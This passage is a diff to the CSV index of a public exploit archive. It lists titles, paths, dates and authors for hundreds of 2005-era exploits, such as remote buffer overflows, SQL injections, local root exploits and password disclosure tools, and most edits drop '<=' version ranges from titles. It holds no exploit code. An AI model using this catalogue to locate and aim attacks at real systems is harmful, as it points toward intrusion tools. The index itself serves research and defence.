845,platforms/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 -846,platforms/windows/local/846.cpp,"Einstein <= 1.01 - Local Password Disclosure Exploit",2005-02-27,Kozan,windows,local,0 +846,platforms/windows/local/846.cpp,"Einstein 1.01 - Local Password Disclosure Exploit",2005-02-27,Kozan,windows,local,0 847,platforms/windows/remote/847.cpp,"BadBlue 2.55 Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 -848,platforms/windows/local/848.asm,"Einstein <= 1.01 - Local Password Disclosure Exploit (asm)",2005-02-28,illwill,windows,local,0 -849,platforms/windows/dos/849.c,"Scrapland <= 1.0 - Server Termination Denial of Service Exploit",2005-02-28,"Luigi Auriemma",windows,dos,0 +848,platforms/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure Exploit (asm)",2005-02-28,illwill,windows,local,0 +849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service Exploit",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 PNG Image Processing Buffer Overflow Exploit",2005-03-02,"Tal Zeltzer",windows,dos,0 853,platforms/cgi/webapps/853.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit (extra)",2005-03-02,omin0us,cgi,webapps,0 854,platforms/windows/remote/854.cpp,"Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit",2005-03-02,Swan,windows,remote,110 -855,platforms/multiple/dos/855.pl,"Apache <= 2.0.52 - HTTP GET request Denial of Service Exploit",2005-03-04,GreenwooD,multiple,dos,0 +855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service Exploit",2005-03-04,GreenwooD,multiple,dos,0 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (Bluetooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 857,platforms/php/webapps/857.txt,"PHP Form Mail 2.3 - Arbitrary File Inclusion",2005-03-05,"Filip Groszynski",php,webapps,0 -858,platforms/php/webapps/858.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 +858,platforms/php/webapps/858.txt,"phpBB 2.0.12 Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 859,platforms/windows/remote/859.c,"CA License Server (GETCONFIG) Remote Buffer Overflow Exploit",2005-03-06,class101,windows,remote,10203 -860,platforms/php/webapps/860.c,"Aztek Forum <= 4.0 - (myadmin.php) Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 +860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - (myadmin.php) Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0 -862,platforms/cgi/webapps/862.txt,"The Includer CGI <= 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 +862,platforms/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 863,platforms/windows/local/863.cpp,"RealPlayer 10 - (.smil) Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 -864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 -865,platforms/php/webapps/865.txt,"PHP mcNews <= 1.3 - (skinfile) Remote File Include",2005-03-07,"Filip Groszynski",php,webapps,0 +864,platforms/php/webapps/864.txt,"phpWebLog 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 +865,platforms/php/webapps/865.txt,"PHP mcNews 1.3 - (skinfile) Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection Exploit",2005-03-08,Silentium,php,webapps,0 -867,platforms/multiple/dos/867.c,"Ethereal <= 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 +867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Exploit",2005-03-09,RusH,bsd,dos,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) <= 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 -871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 - Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 +871,platforms/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0 -874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Windows)",2005-03-12,"Leon Juranic",windows,dos,0 +874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Windows)",2005-03-12,"Leon Juranic",windows,dos,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093 876,platforms/linux/local/876.c,"PaX - Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow Exploit",2005-03-14,"Kevin Finisterre",linux,local,0 -878,platforms/linux/remote/878.c,"Ethereal <= 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Linux)",2005-03-14,"Diego Giagio",linux,remote,0 +878,platforms/linux/remote/878.c,"Ethereal 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Linux)",2005-03-14,"Diego Giagio",linux,remote,0 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 -880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 -881,platforms/php/webapps/881.txt,"ZPanel <= 2.5 - Remote SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0 +880,platforms/multiple/dos/880.pl,"Freeciv Server 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 +881,platforms/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash Exploit",2005-03-15,Komrade,windows,dos,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2)",2005-04-24,cybertronic,windows,remote,2380 -884,platforms/windows/local/884.cpp,"iSnooker <= 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 -885,platforms/windows/local/885.cpp,"iPool <= 1.6.81 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 -886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 +884,platforms/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 +885,platforms/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 +886,platforms/windows/dos/886.pl,"PlatinumFTP 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 887,platforms/windows/dos/887.py,"MailEnable 1.8 - Remote Format String Denial of Service Exploit",2005-03-17,"Tal Zeltzer",windows,dos,0 888,platforms/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service Exploit",2005-03-17,Ali7,windows,dos,0 -889,platforms/php/webapps/889.pl,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 +889,platforms/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 890,platforms/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local,0 -891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 -892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 +891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 +892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0 -896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 -897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 -898,platforms/aix/local/898.sh,"AIX <= 5.3.0 - (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 -899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0 +896,platforms/osx/local/896.c,"Mac OS X 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 +897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 +898,platforms/aix/local/898.sh,"AIX 5.3.0 - (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 +899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25 -901,platforms/php/webapps/901.pl,"PunBB <= 1.2.2 - Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 -902,platforms/linux/remote/902.c,"mtftpd <= 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21 +901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass Exploit",2005-03-29,RusH,php,webapps,0 +902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 -904,platforms/linux/dos/904.c,"Linux Kernel <= 2.6.10 - Local Denial of Service Exploit",2005-03-29,ChoiX,linux,dos,0 +904,platforms/linux/dos/904.c,"Linux Kernel 2.6.10 - Local Denial of Service Exploit",2005-03-29,ChoiX,linux,dos,0 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow Exploit",2005-04-01,class101,windows,local,0 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031 -907,platforms/php/webapps/907.pl,"phpBB <= 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 -908,platforms/windows/dos/908.c,"ArGoSoft FTP Server <= 1.4.2.8 - Denial of Service Exploit",2005-04-03,c0d3r,windows,dos,0 +907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 +908,platforms/windows/dos/908.c,"ArGoSoft FTP Server 1.4.2.8 - Denial of Service Exploit",2005-04-03,c0d3r,windows,dos,0 909,platforms/windows/remote/909.cpp,"Microsoft Windows - (WINS) Remote Buffer Overflow Exploit (3)",2005-04-12,class101,windows,remote,42 -910,platforms/php/webapps/910.pl,"phpBB <= 2.0.13 - 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0 +910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0 911,platforms/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service Exploit",2005-04-04,"Daniel McNeil",linux,dos,0 912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Local Exploit",2005-04-04,Kozan,windows,local,0 913,platforms/linux/local/913.pl,"Aeon 0.2a - Local Linux Exploit (Perl)",2005-04-05,lammat,linux,local,0 914,platforms/linux/local/914.c,"Aeon 0.2a - Local Linux Exploit",2005-04-05,patr0n,linux,local,0 915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x Imapd Remote Exploit",2005-04-05,Expanders,linux,remote,143 916,platforms/windows/dos/916.pl,"MailEnable Enterprise 1.x SMTP Remote Denial of Service Exploit",2005-04-05,CorryL,windows,dos,0 -918,platforms/windows/local/918.c,"FTP Now <= 2.6.14 - Local Password Disclosure Exploit",2005-04-06,Kozan,windows,local,0 +918,platforms/windows/local/918.c,"FTP Now 2.6.14 - Local Password Disclosure Exploit",2005-04-06,Kozan,windows,local,0 919,platforms/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 920,platforms/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 -921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - Remote SQL Injection Exploit",2005-04-07,"Fabrizi Andrea",php,webapps,0 -922,platforms/cgi/webapps/922.pl,"The Includer CGI <= 1.0 - Remote Command Execution (1)",2005-04-08,GreenwooD,cgi,webapps,0 -30090,platforms/php/webapps/30090.txt,"phpPgAdmin <= 4.1.1 Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 -923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0 -924,platforms/linux/local/924.c,"sash <= 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 -925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 +921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection Exploit",2005-04-07,"Fabrizi Andrea",php,webapps,0 +922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (1)",2005-04-08,GreenwooD,cgi,webapps,0 +30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 +923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0 +924,platforms/linux/local/924.c,"sash 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 +925,platforms/asp/webapps/925.txt,"ACNews 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' Bluetooth Signed Buffer Index Local Root (3)",2005-10-26,qobaiashi,linux,local,0 927,platforms/windows/local/927.c,"Microsoft Jet Database (msjet40.dll) DB File Buffer Overflow Exploit",2005-04-11,"Stuart Pearson",windows,local,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection Exploit",2005-04-11,"Stefan Esser",php,webapps,0 929,platforms/windows/local/929.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer DHTML Object Memory Corruption Exploit",2005-04-12,Skylined,windows,remote,0 931,platforms/windows/dos/931.html,"Microsoft Internet Explorer DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 -932,platforms/windows/local/932.sql,"Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit",2005-04-13,"Esteban Fayo",windows,local,0 +932,platforms/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Buffer Overflow Exploit",2005-04-13,"Esteban Fayo",windows,local,0 933,platforms/windows/local/933.sql,"Oracle Database PL/SQL Statement - Multiple SQL Injection Exploits",2005-04-13,"Esteban Fayo",windows,local,0 934,platforms/linux/remote/934.c,"gld 1.4 - (Postfix Greylisting Daemon) Remote Format String Exploit",2005-04-13,Xpl017Elz,linux,remote,2525 -935,platforms/windows/local/935.c,"Morpheus <= 4.8 - Local Chat Passwords Disclosure Exploit",2005-04-13,Kozan,windows,local,0 +935,platforms/windows/local/935.c,"Morpheus 4.8 - Local Chat Passwords Disclosure Exploit",2005-04-13,Kozan,windows,local,0 936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 938,platforms/windows/local/938.cpp,"Microsoft Windows - (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 exit.php SQL Injection Exploit",2005-04-13,kre0n,php,webapps,0 940,platforms/linux/remote/940.c,"Sumus 0.2.2 httpd Remote Buffer Overflow Exploit",2005-04-14,vade79,linux,remote,81 -941,platforms/windows/dos/941.c,"Yager <= 5.24 - Multiple Denial of Service Exploit",2005-04-14,"Luigi Auriemma",windows,dos,0 +941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service Exploit",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options DoS Exploit (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution Exploit",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server (GET Request) Remote BoF Exploit",2005-04-24,cybertronic,windows,remote,80 -946,platforms/multiple/dos/946.c,"PostgreSQL <= 8.01 - Remote Reboot Denial of Service Exploit",2005-04-19,ChoiX,multiple,dos,0 +946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service Exploit",2005-04-19,ChoiX,multiple,dos,0 947,platforms/windows/remote/947.pl,"Microsoft Exchange Server Remote Code Execution Exploit (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit",2005-04-20,houseofdabus,multiple,dos,0 949,platforms/windows/remote/949.c,"PMsoftware Simple Web Server 1.0 - Remote Stack Overflow Exploit",2005-04-20,c0d3r,windows,remote,80 -950,platforms/linux/local/950.c,"BitchX <= 1.0c20 - Local Buffer Overflow Exploit",2005-04-21,sk,linux,local,0 +950,platforms/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow Exploit",2005-04-21,sk,linux,local,0 951,platforms/windows/local/951.py,"Microsoft Jet Database - (msjet40.dll) Reverse Shell Exploit (2)",2005-04-22,"Jean Luc",windows,local,0 952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional https Remote BoF Exploit",2005-04-25,CorryL,windows,remote,8080 -953,platforms/windows/remote/953.c,"Yager <= 5.24 - Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089 -954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 - (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0 +953,platforms/windows/remote/953.c,"Yager 5.24 - Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089 +954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0 955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21 956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0 957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0 959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop DoS Exploit",2005-04-26,vade79,linux,dos,0 -960,platforms/windows/remote/960.c,"MySQL MaxDB Webtool <= 7.5.00.23 - Remote Stack Overflow Exploit",2005-04-27,cybertronic,windows,remote,9999 +960,platforms/windows/remote/960.c,"MySQL MaxDB Webtool 7.5.00.23 - Remote Stack Overflow Exploit",2005-04-27,cybertronic,windows,remote,9999 963,platforms/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure Exploit",2005-04-28,Kozan,windows,local,0 964,platforms/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 965,platforms/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure Exploit",2005-04-28,Kozan,windows,local,0 @@ -794,64 +794,64 @@ id,file,description,date,author,platform,type,port 974,platforms/linux/local/974.pl,"ARPUS/Ce Local Overflow Exploit (setuid) (perl)",2005-05-01,"Kevin Finisterre",linux,local,0 975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow Exploit",2005-05-01,muts,windows,remote,21 976,platforms/windows/remote/976.cpp,"Microsoft Windows WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0 -977,platforms/hp-ux/remote/977.c,"HP-UX FTPD <= 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 +977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 978,platforms/windows/dos/978.cpp,"Ashley's Web Server Denial of Service Exploit",2005-05-04,basher13,windows,dos,0 -979,platforms/windows/remote/979.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit",2005-05-04,Mouse,windows,remote,0 +979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 Unauthenticated User Registration Exploit",2005-05-04,Mouse,windows,remote,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce (i-mall.cgi) Remote Command Execution Exploit",2005-05-04,"Jerome Athias",cgi,webapps,0 981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String Exploit",2005-05-05,cybertronic,linux,remote,25 982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,anonymous,php,webapps,0 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0 -984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 - (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0 +984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0 986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0 -987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 - Unauthenticated User Registeration (2)",2005-05-07,Silentium,windows,remote,0 +987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registeration (2)",2005-05-07,Silentium,windows,remote,0 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0 989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0 990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow",2005-05-17,nolimit,windows,remote,20031 -996,platforms/php/webapps/996.pl,"ZPanel <= 2.5b10 - Remote SQL Injection Exploit",2005-05-17,RusH,php,webapps,0 -997,platforms/linux/local/997.sh,"Linux Mandrake <= 10.2 - cdrdao Local Root Exploit (unfixed)",2005-05-17,newbug,linux,local,0 -998,platforms/linux/dos/998.c,"Linux Kernel <= 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Exploit",2005-05-17,alert7,linux,dos,0 -999,platforms/linux/dos/999.c,"Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 +996,platforms/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection Exploit",2005-05-17,RusH,php,webapps,0 +997,platforms/linux/local/997.sh,"Linux Mandrake 10.2 - cdrdao Local Root Exploit (unfixed)",2005-05-17,newbug,linux,local,0 +998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Exploit",2005-05-17,alert7,linux,dos,0 +999,platforms/linux/dos/999.c,"Gaim 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 -1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 +1003,platforms/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0 1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 -1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board <= 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0 +1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service Exploit",2005-05-21,"Daniel Hartmeier",multiple,dos,0 -1009,platforms/linux/local/1009.c,"Exim <= 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 -1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 -1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php)",2005-05-26,mh_p0rtal,asp,webapps,0 -1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html)",2005-05-26,"Soroush Dalili",asp,webapps,0 -1013,platforms/php/webapps/1013.pl,"Invision Power Board <= 2.0.3 - Login.php SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0 -1014,platforms/php/webapps/1014.txt,"Invision Power Board <= 2.0.3 - Login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 -1015,platforms/asp/webapps/1015.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)",2005-05-27,"Soroush Dalili",asp,webapps,0 -1016,platforms/php/webapps/1016.pl,"phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 -1017,platforms/php/webapps/1017.php,"phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 -1018,platforms/php/webapps/1018.php,"phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 +1009,platforms/linux/local/1009.c,"Exim 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 